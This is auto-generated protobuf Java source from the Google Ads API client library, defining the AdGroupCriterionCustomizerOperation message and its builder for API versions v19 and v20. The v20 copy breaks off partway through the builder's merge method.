google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation) com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperationOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerServiceProto.internal_static_google_ads_googleads_v19_services_AdGroupCriterionCustomizerOperation_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerServiceProto.internal_static_google_ads_googleads_v19_services_AdGroupCriterionCustomizerOperation_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation.class, com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation.Builder.class); } // Construct using com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation.newBuilder() private Builder() { } private Builder( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; if (createBuilder_ != null) { createBuilder_.clear(); } operationCase_ = 0; operation_ = null; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerServiceProto.internal_static_google_ads_googleads_v19_services_AdGroupCriterionCustomizerOperation_descriptor; } @java.lang.Override public com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation getDefaultInstanceForType() { return com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation.getDefaultInstance(); } @java.lang.Override public com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation build() { com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation buildPartial() { com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation result = new com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation(this); if (bitField0_ != 0) { buildPartial0(result); } buildPartialOneofs(result); onBuilt(); return result; } private void buildPartial0(com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation result) { int from_bitField0_ = bitField0_; } private void buildPartialOneofs(com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation result) { result.operationCase_ = operationCase_; result.operation_ = this.operation_; if (operationCase_ == 1 && createBuilder_ != null) { result.operation_ = createBuilder_.build(); } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField( com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof( com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation) { return mergeFrom((com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation)other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation other) { if (other == com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation.getDefaultInstance()) return this; switch (other.getOperationCase()) { case CREATE: { mergeCreate(other.getCreate()); break; } case REMOVE: { operationCase_ = 2; operation_ = other.operation_; onChanged(); break; } case OPERATION_NOT_SET: { break; } } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { input.readMessage( getCreateFieldBuilder().getBuilder(), extensionRegistry); operationCase_ = 1; break; } // case 10 case 18: { java.lang.String s = input.readStringRequireUtf8(); operationCase_ = 2; operation_ = s; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int operationCase_ = 0; private java.lang.Object operation_; public OperationCase getOperationCase() { return OperationCase.forNumber( operationCase_); } public Builder clearOperation() { operationCase_ = 0; operation_ = null; onChanged(); return this; } private int bitField0_; private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer, com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer.Builder, com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizerOrBuilder> createBuilder_; /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer create = 1;</code> * @return Whether the create field is set. */ @java.lang.Override public boolean hasCreate() { return operationCase_ == 1; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer create = 1;</code> * @return The create. */ @java.lang.Override public com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer getCreate() { if (createBuilder_ == null) { if (operationCase_ == 1) { return (com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer) operation_; } return com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } else { if (operationCase_ == 1) { return createBuilder_.getMessage(); } return com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer create = 1;</code> */ public Builder setCreate(com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer value) { if (createBuilder_ == null) { if (value == null) { throw new NullPointerException(); } operation_ = value; onChanged(); } else { createBuilder_.setMessage(value); } operationCase_ = 1; return this; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer create = 1;</code> */ public Builder setCreate( com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer.Builder builderForValue) { if (createBuilder_ == null) { operation_ = builderForValue.build(); onChanged(); } else { createBuilder_.setMessage(builderForValue.build()); } operationCase_ = 1; return this; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer create = 1;</code> */ public Builder mergeCreate(com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer value) { if (createBuilder_ == null) { if (operationCase_ == 1 && operation_ != com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer.getDefaultInstance()) { operation_ = com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer.newBuilder((com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer) operation_) .mergeFrom(value).buildPartial(); } else { operation_ = value; } onChanged(); } else { if (operationCase_ == 1) { createBuilder_.mergeFrom(value); } else { createBuilder_.setMessage(value); } } operationCase_ = 1; return this; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer create = 1;</code> */ public Builder clearCreate() { if (createBuilder_ == null) { if (operationCase_ == 1) { operationCase_ = 0; operation_ = null; onChanged(); } } else { if (operationCase_ == 1) { operationCase_ = 0; operation_ = null; } createBuilder_.clear(); } return this; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer create = 1;</code> */ public com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer.Builder getCreateBuilder() { return getCreateFieldBuilder().getBuilder(); } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer create = 1;</code> */ @java.lang.Override public com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizerOrBuilder getCreateOrBuilder() { if ((operationCase_ == 1) && (createBuilder_ != null)) { return createBuilder_.getMessageOrBuilder(); } else { if (operationCase_ == 1) { return (com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer) operation_; } return com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer create = 1;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer, com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer.Builder, com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizerOrBuilder> getCreateFieldBuilder() { if (createBuilder_ == null) { if (!(operationCase_ == 1)) { operation_ = com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } createBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer, com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer.Builder, com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizerOrBuilder>( (com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer) operation_, getParentForChildren(), isClean()); operation_ = null; } operationCase_ = 1; onChanged(); return createBuilder_; } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return Whether the remove field is set. */ @java.lang.Override public boolean hasRemove() { return operationCase_ == 2; } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return The remove. */ @java.lang.Override public java.lang.String getRemove() { java.lang.Object ref = ""; if (operationCase_ == 2) { ref = operation_; } if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); if (operationCase_ == 2) { operation_ = s; } return s; } else { return (java.lang.String) ref; } } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return The bytes for remove. */ @java.lang.Override public com.google.protobuf.ByteString getRemoveBytes() { java.lang.Object ref = ""; if (operationCase_ == 2) { ref = operation_; } if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8( (java.lang.String) ref); if (operationCase_ == 2) { operation_ = b; } return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @param value The remove to set. * @return This builder for chaining. */ public Builder setRemove( java.lang.String value) { if (value == null) { throw new NullPointerException(); } operationCase_ = 2; operation_ = value; onChanged(); return this; } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return This builder for chaining. */ public Builder clearRemove() { if (operationCase_ == 2) { operationCase_ = 0; operation_ = null; onChanged(); } return this; } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @param value The bytes for remove to set. * @return This builder for chaining. */ public Builder setRemoveBytes( com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); operationCase_ = 2; operation_ = value; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation) } // @@protoc_insertion_point(class_scope:google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation) private static final com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation(); } public static com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<AdGroupCriterionCustomizerOperation> PARSER = new com.google.protobuf.AbstractParser<AdGroupCriterionCustomizerOperation>() { @java.lang.Override public AdGroupCriterionCustomizerOperation parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<AdGroupCriterionCustomizerOperation> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<AdGroupCriterionCustomizerOperation> getParserForType() { return PARSER; } @java.lang.Override public com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleads/google-ads-java
35,915
google-ads-stubs-v20/src/main/java/com/google/ads/googleads/v20/services/AdGroupCriterionCustomizerOperation.java
// Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/ads/googleads/v20/services/ad_group_criterion_customizer_service.proto // Protobuf Java Version: 3.25.7 package com.google.ads.googleads.v20.services; /** * <pre> * A single operation (create, remove) on a customizer attribute. * </pre> * * Protobuf type {@code google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation} */ public final class AdGroupCriterionCustomizerOperation extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation) AdGroupCriterionCustomizerOperationOrBuilder { private static final long serialVersionUID = 0L; // Use AdGroupCriterionCustomizerOperation.newBuilder() to construct. private AdGroupCriterionCustomizerOperation(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private AdGroupCriterionCustomizerOperation() { } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance( UnusedPrivateParameter unused) { return new AdGroupCriterionCustomizerOperation(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerServiceProto.internal_static_google_ads_googleads_v20_services_AdGroupCriterionCustomizerOperation_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerServiceProto.internal_static_google_ads_googleads_v20_services_AdGroupCriterionCustomizerOperation_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation.class, com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation.Builder.class); } private int operationCase_ = 0; @SuppressWarnings("serial") private java.lang.Object operation_; public enum OperationCase implements com.google.protobuf.Internal.EnumLite, com.google.protobuf.AbstractMessage.InternalOneOfEnum { CREATE(1), REMOVE(2), OPERATION_NOT_SET(0); private final int value; private OperationCase(int value) { this.value = value; } /** * @param value The number of the enum to look for. * @return The enum associated with the given number. * @deprecated Use {@link #forNumber(int)} instead. */ @java.lang.Deprecated public static OperationCase valueOf(int value) { return forNumber(value); } public static OperationCase forNumber(int value) { switch (value) { case 1: return CREATE; case 2: return REMOVE; case 0: return OPERATION_NOT_SET; default: return null; } } public int getNumber() { return this.value; } }; public OperationCase getOperationCase() { return OperationCase.forNumber( operationCase_); } public static final int CREATE_FIELD_NUMBER = 1; /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer create = 1;</code> * @return Whether the create field is set. */ @java.lang.Override public boolean hasCreate() { return operationCase_ == 1; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer create = 1;</code> * @return The create. */ @java.lang.Override public com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer getCreate() { if (operationCase_ == 1) { return (com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer) operation_; } return com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer create = 1;</code> */ @java.lang.Override public com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizerOrBuilder getCreateOrBuilder() { if (operationCase_ == 1) { return (com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer) operation_; } return com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } public static final int REMOVE_FIELD_NUMBER = 2; /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return Whether the remove field is set. */ public boolean hasRemove() { return operationCase_ == 2; } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return The remove. */ public java.lang.String getRemove() { java.lang.Object ref = ""; if (operationCase_ == 2) { ref = operation_; } if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); if (operationCase_ == 2) { operation_ = s; } return s; } } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return The bytes for remove. */ public com.google.protobuf.ByteString getRemoveBytes() { java.lang.Object ref = ""; if (operationCase_ == 2) { ref = operation_; } if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8( (java.lang.String) ref); if (operationCase_ == 2) { operation_ = b; } return b; } else { return (com.google.protobuf.ByteString) ref; } } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (operationCase_ == 1) { output.writeMessage(1, (com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer) operation_); } if (operationCase_ == 2) { com.google.protobuf.GeneratedMessageV3.writeString(output, 2, operation_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (operationCase_ == 1) { size += com.google.protobuf.CodedOutputStream .computeMessageSize(1, (com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer) operation_); } if (operationCase_ == 2) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, operation_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation)) { return super.equals(obj); } com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation other = (com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation) obj; if (!getOperationCase().equals(other.getOperationCase())) return false; switch (operationCase_) { case 1: if (!getCreate() .equals(other.getCreate())) return false; break; case 2: if (!getRemove() .equals(other.getRemove())) return false; break; case 0: default: } if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); switch (operationCase_) { case 1: hash = (37 * hash) + CREATE_FIELD_NUMBER; hash = (53 * hash) + getCreate().hashCode(); break; case 2: hash = (37 * hash) + REMOVE_FIELD_NUMBER; hash = (53 * hash) + getRemove().hashCode(); break; case 0: default: } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation parseFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input); } public static com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * <pre> * A single operation (create, remove) on a customizer attribute. * </pre> * * Protobuf type {@code google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation) com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperationOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerServiceProto.internal_static_google_ads_googleads_v20_services_AdGroupCriterionCustomizerOperation_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerServiceProto.internal_static_google_ads_googleads_v20_services_AdGroupCriterionCustomizerOperation_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation.class, com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation.Builder.class); } // Construct using com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation.newBuilder() private Builder() { } private Builder( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; if (createBuilder_ != null) { createBuilder_.clear(); } operationCase_ = 0; operation_ = null; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerServiceProto.internal_static_google_ads_googleads_v20_services_AdGroupCriterionCustomizerOperation_descriptor; } @java.lang.Override public com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation getDefaultInstanceForType() { return com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation.getDefaultInstance(); } @java.lang.Override public com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation build() { com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation buildPartial() { com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation result = new com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation(this); if (bitField0_ != 0) { buildPartial0(result); } buildPartialOneofs(result); onBuilt(); return result; } private void buildPartial0(com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation result) { int from_bitField0_ = bitField0_; } private void buildPartialOneofs(com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation result) { result.operationCase_ = operationCase_; result.operation_ = this.operation_; if (operationCase_ == 1 && createBuilder_ != null) { result.operation_ = createBuilder_.build(); } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField( com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof( com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation) { return mergeFrom((com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation)other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation other) { if (other == com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation.getDefaultInstance()) return this; switch (other.getOperationCase()) { case CREATE: { mergeCreate(other.getCreate()); break; } case REMOVE: { 